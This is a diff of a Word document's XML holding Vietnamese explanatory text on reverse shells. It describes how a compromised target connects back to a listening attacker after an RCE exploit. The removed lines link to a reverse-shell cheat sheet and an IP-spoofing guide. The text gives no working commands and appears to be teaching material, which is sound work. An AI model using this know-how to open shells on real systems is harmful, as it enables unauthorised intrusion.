-      <w:hyperlink r:id="rId7" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rStyle w:val="Hyperlink"/>
-        </w:rPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId8" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>https://maytinhkhoe.com/thu-thuat/huong-dan-fake-ip-don-gian-bang-phan-mem-proxifier.html/</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> web shell, bind </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>shell,..</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ) </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>là</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> shell </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>có</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>kết</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>nối</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>bắt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>nguồn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>từ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 1 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>máy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>chủ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>đóng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>vai</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>trò</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>là</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> target </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>đến</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 1 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>máy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>chủ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>khác</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>đóng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>vai</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>trò</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> host . </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Khi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>đó</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> target </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>sẽ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>tạo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>kết</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>nối</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ra</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>bên</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ngoài</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>và</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> host </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>sẽ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>lắng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>nghe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Trong</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>trường</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>hợp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Attacker </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>mà</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>đã</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>khai</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>thác</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>được</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>lỗ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>hổng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>có</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>thể</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>dẫn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>đến</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> RCE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>có</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>thể</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>dùng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Reverse shell </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>để</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>tạo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>kết</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>nối</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>đến</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>máy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> attacker </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>để</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> hacker </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>thao</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>tác</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>với</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>máy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> target. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Một</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Reverse shell </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Tìm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>hiểu</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
